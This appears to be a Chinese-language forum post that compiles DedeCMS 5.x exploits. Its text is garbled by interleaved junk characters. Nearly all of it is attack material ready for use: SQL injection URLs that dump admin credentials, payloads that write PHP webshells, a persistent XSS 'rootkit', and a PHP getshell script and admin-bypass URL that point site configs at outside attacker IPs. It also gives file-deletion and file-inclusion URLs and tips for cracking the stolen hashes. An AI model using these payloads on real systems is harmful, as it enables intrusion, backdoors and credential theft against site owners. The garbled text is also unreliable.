|
|
4 x- S2 z3 K% [Dedecms 5.6 rss注入漏洞
& a$ J9 J" i* t7 e% y( Whttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=13 n) X2 ?0 J; H
# O- j, U: h* g1 v: M7 F. m- V1 D/ k+ H" i, Z* N# x
2 `, `3 f2 y4 Q8 J. ~) m; F: y/ r% r/ |+ \" i" \4 s: X
7 @+ W; C7 U+ W3 H+ h
2 S! S3 G- @( h1 ^5 G
+ j, Z( z+ u( a: X6 j, N
, e: {$ I4 V2 G! ^! v/ BDedeCms v5.6 嵌入恶意代码执行漏洞1 U. a$ R" |( e; g( {9 a! l
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
# l( ~" A- E+ }发表后查看或修改即可执行' B. X4 @7 m* N2 X) H
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
5 D- s1 y0 [9 l生成x.php 密码xiao,直接生成一句话。" W3 t+ i% J4 e; e4 b) c5 ]' f3 G& Q
- I6 d( l$ Q- t
! {) Y8 c6 u7 o& ^
" [- L% C, R! q$ @$ X0 o& U* w; |. z* }
! M8 w" H K8 w% |2 m( p% H; s3 E+ w% k
: H$ l- K" g) l7 Q! `9 \" [
. H5 e& e4 z: E$ N, S- {Dede 5.6 GBK SQL注入漏洞4 ^$ K6 x! a5 ~5 T- _
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7''; J; p% d, \0 P" M! t2 }6 f
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe8 t8 `( u. F% o I2 P
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7( I$ V2 n* e# P Y, B
3 M& D( g7 V) w2 |7 C0 N
5 w- k/ Z k( w( `* [8 {
2 @, }+ t% J+ K- ~/ @+ [
9 j3 j0 b$ j' d" ]4 t$ c3 k' \
3 ]- L C: t- z6 p R$ x
& l+ r2 s) `2 L1 d1 T; f% L f
7 ? @6 S- q5 S' R6 A% V8 ?, Y u
" ?9 o+ @3 G% v9 K1 L
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞5 I) F7 q/ l" p1 V! a* d/ _
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
/ V8 ]1 A. \, S+ ^
5 R1 q3 o6 }) Y2 F1 x$ l! k. d
: p6 M% M! x# P% \7 m" S
& v0 E8 n1 v. f8 F
) Z& a3 e/ a# p5 \- G |
, B) l. o8 q: k4 N0 {) k0 S0 W$ Y6 D1 h8 B+ Y
DEDECMS 全版本 gotopage变量XSS漏洞
% R- r- J/ k. I1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
1 M* z# Q! `- R: ~6 F ~4 xhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
3 J/ T# u/ [5 k1 J5 t0 ^9 F
8 A3 b2 Q5 J- P$ X) h* v: M5 f- l% C' `4 y
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
" [1 B# }3 [6 s7 t3 zhttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
, T. \+ R- S6 M* |1 `1 t
+ T( e/ {& @: x9 v4 L* a4 i- k* J' V: q' ?. Z1 b2 z
http://v57.demo.dedecms.com/dede/login.php3 u7 ?+ e T! u# F
2 j. i o- S- S( I5 A9 Q
$ j9 w5 k3 Q! A
color=Red]DeDeCMS(织梦)变量覆盖getshell0 r/ {" p; ?8 k
#!usr/bin/php -w& l( K: M; v$ O8 u/ |' ?+ j
<?php; i& [4 g, o+ i5 m% ^1 G
error_reporting(E_ERROR);
* O% R: `3 r/ a5 M& } H2 i3 tset_time_limit(0);
- E) h8 e0 C: x8 lprint_r(') ~3 s) K+ G3 X1 }
DEDEcms Variable Coverage1 P5 }1 V* E) ?* N+ S
Exploit Author: www.heixiaozi.comwww.webvul.com
; S5 K( C- }$ j3 r; ? q);* {3 O# q1 e3 v
echo "\r\n";0 X, Q6 w. H# N U' q
if($argv[2]==null){
6 I7 a* \/ E, q4 O- i6 ?: xprint_r('
: R0 k3 P/ \* G# O% P t" Y( k0 y+---------------------------------------------------------------------------+& H4 E" Z+ @5 L, q
Usage: php '.$argv[0].' url aid path1 J& s' x1 H# [: m9 [% Q5 Q
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
3 {/ @: v, ]9 J; o6 I% l3 MExample:! ]. W* V' A n0 I5 Y$ X; ], l
php '.$argv[0].' www.site.com 1 old- n+ K9 x; p& e9 e8 N |$ q
+---------------------------------------------------------------------------+# i+ O7 i- a2 A: Q1 a
');. P" K5 n. l4 X, v
exit;
2 X1 I* q; E7 ?}
B5 s. w6 J7 a2 ^% e B3 n( x$url=$argv[1];
$ \; Z" y* a( y5 K& \6 f* ^) q$aid=$argv[2];* c. x( W: [2 [9 ?* g d+ O; L1 i
$path=$argv[3];9 _, G+ X9 K* N$ X+ s4 J3 Z
$exp=Getshell($url,$aid,$path);
* _ U9 p& P9 p$ l" Rif (strpos($exp,"OK")>12){2 Q8 C$ f' k/ b- z
echo "7 [ |- R+ Q" r' J) G
Exploit Success \n";3 }. k$ }4 ^" f0 k
if($aid==1)echo "
, w J7 r1 l! \& a, HShell:".$url."/$path/data/cache/fuck.php\n" ;
" o# d% Z: p1 @1 |8 S
9 W; q, Y. _8 R5 D% j6 ?: F6 d9 y- _* Y8 t7 K
if($aid==2)echo "
7 w2 t5 ~8 k% {. I! [+ ZShell:".$url."/$path/fuck.php\n" ;
; C) u' {1 D: U2 H; m0 @
. U& _- O7 J6 ?! j8 p# ]' J4 {5 Z1 ~" J6 u
if($aid==3)echo "
$ ^' r: A7 r& @% E4 I0 jShell:".$url."/$path/plus/fuck.php\n";
: ~, i1 C* _8 v& f V1 n
k5 a3 Z2 h" e6 W/ q1 v" B
- ^. U* ^) o8 o" R$ x4 w" y; e}else{0 k3 M0 Z7 {" k5 }( k J) b
echo "
( B" j+ x6 [* _; J) MExploit Failed \n";
, h% e. W m: \8 y% h6 s$ `# q}
; |5 z: w& }$ @9 F5 }0 s$ Q: Hfunction Getshell($url,$aid,$path){. d' [: E d! V! d' O9 K. g3 h& i
$id=$aid;
4 b* R- m" Q% _& u/ q& e$host=$url;
0 K1 G' q7 G g9 N& P' {9 b$port="80";
! X2 ^: p1 x7 K* o y, f @# c( e. W$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";+ W" R( J% R" S5 H
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";, i8 B( K. a& S# F
$data .= "Host: ".$host."\r\n";
- c/ O6 `) I) d& _: x$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";) U: { p5 j) O( _/ O3 b; x
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
: s! }& o1 u% a6 i7 R. N$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
. ~5 |0 J. D) A! D( y" R u//$data .= "Accept-Encoding: gzip,deflate\r\n";: W; m( c9 h7 K/ t" g
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
9 G) t3 o0 x% k# b1 G4 o+ w$ H; ]$data .= "Connection: keep-alive\r\n";
' D/ ^: X5 j- U+ d! y, H7 L8 j$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
( W# t9 B) O3 C" S$data .= "Content-Length: ".strlen($content)."\r\n\r\n";) n; ]9 ^# R/ ~- [; L: N
$data .= $content."\r\n";( ^- S( J: d; H6 D& S2 d2 v
$ock=fsockopen($host,$port);/ J0 ?) k2 B& Z/ s
if (!$ock) {
* K* T) K7 t+ y% J6 X1 \echo "- M) d- M6 J/ l1 X0 N
No response from ".$host."\n";% B4 U. i i0 ~, S1 X7 ?9 e
}; V+ i* s, m% @& F, R# w' S: Z# W% T
fwrite($ock,$data);
3 n+ |- b" v" N$ s, z. gwhile (!feof($ock)) {( z7 n0 t4 t7 m$ X, X2 D
$exp=fgets($ock, 1024);
! |8 p+ e2 T+ Freturn $exp;6 q: h1 E5 }7 ?! }
}+ k0 o' V6 R( A# ^2 A# k' r: P3 s
}
1 d3 b2 P9 |1 j' X: p; J8 Y8 D9 E3 S) K& R r& p
$ m8 _5 U. J/ H3 }- I+ J& X* ?& `6 t?> ]3 |6 I z+ Z; s' w) }: t
- G& b9 `' z$ X
" M/ k% F3 }) k P1 N! P! v
+ n0 f0 M4 ^% p! }# Z5 F
$ L! m0 C( |8 s
$ k; E4 b! _. A# Z
9 h" e, x2 k6 h/ K3 K" p$ b) _
& T; Z0 H8 ^$ G
& R" }9 N/ m- x1 p+ N* Q+ d [% s7 |4 q# F& A9 _
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
* d# ~: |0 X6 }$ whttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
7 S' c6 P* J0 M- W9 D/ W5 N# B+ @8 O; L1 i8 {
; Q( ^7 Q; ?# g3 A6 o把上面validate=dcug改为当前的验证码,即可直接进入网站后台/ j" A# q1 \% A% v
: u. P- b4 B$ z( i/ W
, U; W* Z( F1 ~8 Y* Q; e6 I此漏洞的前提是必须得到后台路径才能实现7 e7 G; n$ h( }$ K
' z* w k# ]& x2 J. Y- H4 m4 [# j2 ?; J( B# n9 g$ _* Z
+ }4 S! n/ W7 L4 {, i. h; K" r! {3 r) Y$ [+ Q& y. J
$ E9 p. w# c2 T1 t# v; z# K( S, u
$ @3 W8 ]. ]1 l* h$ Y+ D1 v! p, W" a2 @( T5 h. Q# h
$ B' ~# g/ T. {. Y% T# b# A! j
2 A0 }2 A! E' @. x
/ |+ d }# s( z% |Dedecms织梦 标签远程文件写入漏洞
) T Z1 m) E) {& R4 u$ Q前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');9 h7 K) s! q) V2 I% |0 K5 i c4 h* L
% p! { B0 g7 ?" v6 B
. b1 V+ x! F2 x8 h0 I+ x% g. j再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
c" h: G5 I& L+ ^/ ]<form action="" method="post" name="QuickSearch" id="QuickSearch">3 x) b [! ^6 }% B Z! B0 A% Y
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />+ `& q) b* m0 ^
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />" i" R6 y) e4 M8 T
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
W, C) ~( n! K* x8 T0 ?8 K; U<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
9 U( V3 ?( K; G5 _<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
% L7 x- r( p' J Y6 \% O<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
1 A" k% }$ H: a8 ]! I+ V: D6 U. D, Z<input type="text" value="true" name="nocache" style="width:400">
: ]- J3 W8 E4 W% u<input type="submit" value="提交" name="QuickSearchBtn"><br />' u2 n: v* y1 G# F
</form>% [% ]6 H- w" B0 T5 g- q0 L
<script>
" [$ c- s5 L0 {' L3 [* x+ J5 j9 \function addaction()/ w, T5 F5 w I
{
S, S1 W+ e- G2 s! `document.QuickSearch.action=document.QuickSearch.doaction.value;8 S: P) M( S- Y5 e
}
E% }& `! S, a' u6 C</script>4 K" T* D& W: p) o
5 I/ k( c9 q7 ]; t
1 Y0 @) l. T8 S5 F3 w% x
% F& x' q3 }6 M, g1 _% W1 }5 n5 T8 ~$ z) H+ \4 P0 j
- g( s! v% L; `# ]& }7 ]
3 C5 c# l! K+ ?1 W' u5 S$ C& H
5 N6 {- [1 z7 s4 c1 H( X
% U! Z5 s, B" }
9 k$ K0 a1 R& l
9 A+ }, G+ n# [DedeCms v5.6 嵌入恶意代码执行漏洞6 L7 K6 ?) E% K) j2 b
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
# L5 L' F/ G& b3 j F. Ca{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
K: s V2 a, Y* {7 z生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
( P$ q. ?: B, a, nDedecms <= V5.6 Final模板执行漏洞! v8 ]2 G5 h4 t4 ?: {5 z1 B' ^
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:; }4 v+ t* F' x4 K' e6 `
uploads/userup/2/12OMX04-15A.jpg
) A# Y1 W# m$ }6 B9 R
* J5 B8 j9 q0 g1 |2 S- M
0 |' h! p, b' ^1 i, F- M7 I& r模板内容是(如果限制图片格式,加gif89a):
; P4 t$ f, L9 {# S% f8 L+ @! I0 ~1 T* v{dede:name runphp='yes'}
) s+ m; V |* ]& ]6 [' [* i7 r$fp = @fopen("1.php", 'a');
$ F# G! Z- I+ w# V7 V@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
1 W E/ P: d, T* N$ |/ C# Z# `@fclose($fp);
: l: u" d8 H- \, [4 n{/dede:name}# {1 F- ?/ l' u
2 修改刚刚发表的文章,查看源文件,构造一个表单:
- \5 Z+ F1 d k! v7 S<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
4 |. q \7 n2 [<input type="hidden" name="dopost" value="save" />
{4 d, j& @( n<input type="hidden" name="aid" value="2" />3 z1 G. q) [2 d e/ Y
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />' {+ g$ ^ s4 C {3 r/ I' {
<input type="hidden" name="channelid" value="1" />
2 o% f" E3 r+ P; |<input type="hidden" name="oldlitpic" value="" />$ Q8 j. ]4 j2 ?* E# L" N. X- W
<input type="hidden" name="sortrank" value="1275972263" />+ q; R; {& x1 W' z# j
: \( N7 N! W* t; R6 `
- F, G# x7 P! n! G! L8 z8 X$ d
<div id="mainCp">8 n! G' n+ ]: o' e7 O; M* G7 v- k
<h3 class="meTitle"><strong>修改文章</strong></h3>
+ o& q5 T/ J+ E5 @/ W; ^1 \6 E3 `$ `9 q! n1 p
9 J# y. D `- h& y# `2 d7 K6 }<div class="postForm">
, H U9 y& q5 B) o/ V<label>标题:</label>
. Q v2 ?4 M: f8 t" k<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
8 k/ M+ T3 ~0 _$ v' x1 w; U! ]' \( U1 s( n
. D8 W, h' A" a. o5 h' U<label>标签TAG:</label>0 g1 z3 J3 p9 z# \+ l6 @* @
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开). Q+ W2 f4 f! e9 o
. u, k' X* f% s7 ]2 C$ j6 U
2 k9 G! m+ k3 a2 H2 u5 j
<label>作者:</label>
+ f* S3 x0 ?7 ?; l! z) \: I<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
9 A1 k+ a& J" @. b4 ?
. J7 I/ l7 X2 A& b. F+ ?) N: x
4 I2 r$ B! O+ q" p6 ~<label>隶属栏目:</label>) n; K7 R4 y& l/ s# z$ Q
<select name='typeid' size='1'>6 \' u4 u( j8 P5 N
<option value='1' class='option3' selected=''>测试栏目</option>
' O6 D/ I# S8 d( Y</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
& O) J, V6 w- W& N7 ~0 z7 {" q1 C" l( r3 L( {3 O) E2 J
" ?0 ~8 t& r% F0 p
<label>我的分类:</label>! ?; [1 ~: o' k( ^
<select name='mtypesid' size='1'>; y: h3 f* J) u5 \. ?) E7 c) o" D- g
<option value='0' selected>请选择分类...</option>
6 ~, z* G( I5 }<option value='1' class='option3' selected>hahahha</option>
& ]2 F. Z3 @- p7 m0 m1 V/ Y, \' F3 b</select>, K9 E/ K: K. u# N! S9 f
, T4 l o) V9 X2 g8 O
, {. |9 n! B) U1 v<label>信息摘要:</label>% n& m# E6 Q$ H* A( J2 n
<textarea name="description" id="description">1111111</textarea>
& f2 D \! B; r- O(内容的简要说明); U4 e9 @8 v: n% V3 G2 A
% o& t6 e: a9 }* A% H4 e) ^
# y/ C1 ~1 Y: B; ^1 V/ d/ j4 q$ ~
<label>缩略图:</label>9 r F4 D7 W( h: O! H
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>4 P( J# N; ]2 l4 L
3 U6 d( }( T# V' R Z7 }
# X' g! }' N0 {' }8 Y* ]<input type='text' name='templet'- {& I* R! @: [8 e% Y. ?; E
value="../ uploads/userup/2/12OMX04-15A.jpg">
- l- s& g- Y! ?- c<input type='text' name='dede_addonfields'
- j$ p+ Z% E: q# A9 _7 Ovalue="templet,htmltext;">(这里构造)
% [4 K; D4 I3 f, E; w7 g( n/ P</div>+ I3 Q* t% Z1 t$ b
8 S* E8 ~- k7 X& V; E$ j4 C7 c$ c
& h Y0 N9 s' O<!-- 表单操作区域 -->
7 k# f# Y6 d( Z( \<h3 class="meTitle">详细内容</h3>
2 Q9 a- q. E& b. ]" q# k E. W2 W
2 j0 F$ Z: E( k: `( g5 k0 q+ a
( [, e3 E# `) }! g/ I& Z<div class="contentShow postForm">
; f5 E0 l5 z! D/ v1 ]6 ^/ U5 X7 C<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
! o9 c% R' }! Q1 |5 N! N" i1 H" V1 X! e$ {8 |7 G- d1 ?' |, F
% s- M# ^; s$ l) M& S( B: g<label>验证码:</label>" M. E; U3 I. r
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />6 z$ H' N* o5 y& I# M$ e& d% O
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />! p9 W5 c, m, a+ h6 \7 q3 R5 Y& \
$ O1 g, I0 a4 w) D- H( s* J( _% ]: m( H0 L- o
<button class="button2" type="submit">提交</button>, u( A$ {6 S R* V8 ?
<button class="button2 ml10" type="reset">重置</button>
( c1 \. t! L- Y Q</div>
* X, j0 ?6 b. k( T* x( U
( Y' `4 V$ S2 y: B @( B
8 K* r: L/ t1 s</div>
4 S1 t: {! B- _3 N# w z7 B0 r! v3 E- r- R. \
9 e0 E8 @. u4 {4 f) K0 w9 B% M3 v</form>5 s8 e8 a! X# Y" u. @2 [2 {
: [8 t0 L s+ K, M
! U- y2 X) J- a, b
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
, h) X9 i, w! i( h$ B' F假设刚刚修改的文章的aid为2,则我们只需要访问:
, P) d2 D; J* @% a) _7 Z* N* a. Mhttp://127.0.0.1/dede/plus/view.php?aid=2/ q4 l% J* g. c! C" t
即可以在plus目录下生成webshell:1.php( [5 _ V' D4 g2 E/ z+ O
& @; C* z6 Q0 _' [; G4 m2 @
$ n1 P6 K( M) `5 a- _4 M% W4 x% V% r8 o
O9 i3 z+ q3 Q% g
& U3 E4 F6 G" @. x& u
7 o' B" n9 d0 f5 G
5 c$ n( o# M5 r( a: D, w$ l, J
7 z$ M' S( W! ^, \9 a% J# E2 N0 R5 P! b* W
; K+ U% g: W, p- }/ B
5 h! ] v+ ?* W5 `& W2 P
0 W. q% N" r( I# b8 v
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
2 n w; S- C3 [4 R" G4 ~Gif89a{dede:field name='toby57' runphp='yes'}* D# B4 S4 i6 r
phpinfo();/ q" z* G3 E# }6 N, Q
{/dede:field}1 e+ O% D0 V; D
保存为1.gif
3 U9 @% x9 r; P, u- M9 [8 S<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
% U5 D( b4 d0 K6 `/ _<input type="hidden" name="aid" value="7" /> 8 P5 Q5 h$ O. S' D" N1 Z5 X
<input type="hidden" name="mediatype" value="1" />
) `6 n% h/ D' T1 ~( n5 X' h<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
& Y7 M* K& c/ M: E, N6 _! T<input type="hidden" name="dopost" value="save" /> ) c6 e, P+ B+ W" U6 w& `* ]
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
" Z+ i. J6 E5 N- g6 X9 o, R<input name="addonfile" type="file" id="addonfile"/>
+ E5 \+ |% j0 C, q8 m# S<button class="button2" type="submit" >更改</button>
! `5 x; ?$ j% l& R8 A' ~* ~7 X</form>
9 j6 S# U C0 D! O9 u. Y' B: Q8 s( ]" C; ]3 q# Q, `
' o3 s, S5 i4 M- E& I) F构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
/ U4 _4 v3 z% _- C' G发表文章,然后构造修改表单如下:4 g! o7 b+ b* S9 }& K ]2 X
: ~+ I- X4 w% K3 S5 d5 ~
' w8 Y* g8 X) V6 j: L<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> . V8 Y6 q4 P" {( y1 N/ D
<input type="hidden" name="dopost" value="save" />
& B1 ~' g- C4 s' N& L8 Q0 a$ j<input type="hidden" name="aid" value="2" />
1 \2 r1 c& x. S<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> : J6 g( Q' z" j' M8 r' k" k7 D' w; C* W5 C
<input type="hidden" name="channelid" value="1" /> 1 P$ G- n% A7 p4 N1 X. D- U
<input type="hidden" name="oldlitpic" value="" />
, q9 v r1 ]" C, M<input type="hidden" name="sortrank" value="1282049150" /> % w# @: \, x; J! K7 [2 f0 z
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> 8 Y+ q, b6 }2 i% T: t8 n% m' A
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
w' e0 x2 Q; Z<select name='typeid' size='1'>
: I" f, Z+ ^) ^: F: j& o' H<option value='1' class='option3' selected=''>Test</option> " s! H6 p( T7 t- o/ k% J
<select name='mtypesid' size='1'>
' t" u# C+ k5 R3 M<option value='0' selected>请选择分类...</option> ; W' \ i- p4 j! N- ?# i
<option value='1' class='option3' selected>aa</option></select>
% Y: n! W# L; \" w% l& r<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
: A4 g: \, B& ^" c) K- c2 f<input type='hidden' name='dede_addonfields' value="templet">
. J8 O5 x$ x+ b6 q0 a& u<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> [5 K- p; K; E& A, D
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
7 d9 Y4 F; I! O2 F<button class="button2" type="submit">提交</button>
# a# _- s. c5 G: w6 \$ L</form>6 E' y2 R4 A: F/ }1 Z! h
: a. v9 h# p! L9 j
# D! I4 \9 U+ X$ {
$ U/ n) B7 M5 T7 R% [. k( ^/ P7 q- G3 [ h6 U% O! E: G% o
& o( a8 E/ b) Z4 O
) V' M3 G+ { n
% T0 d: S+ s2 {- r
7 a0 V! w. A7 |
" `* n, z: h I9 N; U
- ?* B7 ^9 B% [" x$ t' `
! j) r3 j/ L0 ?1 A" m+ ?# f3 N4 V; Y6 @; E* C% G
织梦(Dedecms)V5.6 远程文件删除漏洞
' `$ y" u7 j! W& b* x/ `http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif( X( X# u/ e7 }7 D7 N: {3 u; F
8 z% A0 R' Q- A6 X3 \2 D$ [# t. L4 m6 a P! P
7 F1 y8 Q* | |4 b' n' d( H: I
3 w9 Y s8 w n/ k" H$ d9 D
, ?- G2 C$ j7 n! o+ g7 M7 M1 T5 p
) d8 h1 I: m+ W6 X
3 X+ l3 G6 P: P; r& K: |
5 X/ }9 R4 D' T9 z6 X' {# V
5 k# z; Y* v! x
/ d- |& l; b# I+ X织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
; F6 Q+ W8 W( f% _% J/ qhttp://www.test.com/plus/carbuya ... urn&code=../../
9 @/ _; s+ q# w; F) p) m
# O: \& E8 N; S" t+ @
2 e9 D C4 T& m0 E7 ]# h% P; j* S4 l" c" s1 I) A
- |$ _ h3 `" @% e; Q$ }( {
& b1 I' \3 _4 J0 B; L$ w/ V; r' L5 }4 L
7 e7 R5 r9 o; B; B$ X$ {7 k( @/ C
4 D$ s/ Q P/ v/ Q( S
+ @* Z) `1 h; z! E! n0 H/ d# r$ }% U; ]7 D' H* S
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 4 G9 O( u& \9 ^; w; y$ Y5 v- p/ J% w6 i
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
9 i: n5 U9 c) A* `密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5" y. l. ^, x: @# k( o. o
, _1 e( d2 I( h% c# K0 u) J" h
: e# B3 g) [$ f4 H- f' d/ D: J
/ J2 ]+ o0 F+ ^/ Z* k: U$ `( O/ p7 e1 d- l$ \6 c2 ~4 k5 n$ G
* s! |8 X, C2 l) l2 J9 S8 H( C% L5 N
! F w- F9 r( U0 n$ g4 @ S9 l+ `. J, t+ l7 O1 {! x
* G& x8 v* `; C0 [" x8 ~7 q) |' R
0 A3 k t& p$ B$ h织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
0 T9 D& ~! T+ F1 xhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='2 R" S9 d% d* I8 [% c' H, y7 s. l
& F7 W$ d& H7 t
" T) x' k2 k0 s6 b. W! [( _1 |
' f; Z N5 j) f5 q0 Y3 N2 M& |* b) O3 B8 l# q, \
]/ S. ~! [7 k
, W$ s1 p( B" l* r* n& h" }: x
?. r( U+ i& X8 K- ~
0 s& \2 K8 M! J; T# x+ d$ Q- l% g* k
' `! D6 d: q9 `, b0 {% Z
4 \5 S5 \, e; Z2 V织梦(Dedecms)select_soft_post.php页面变量未初始漏洞/ B( M, ~' F1 C. u1 H: D" }
<html>
( g5 o- ]% @6 x<head>
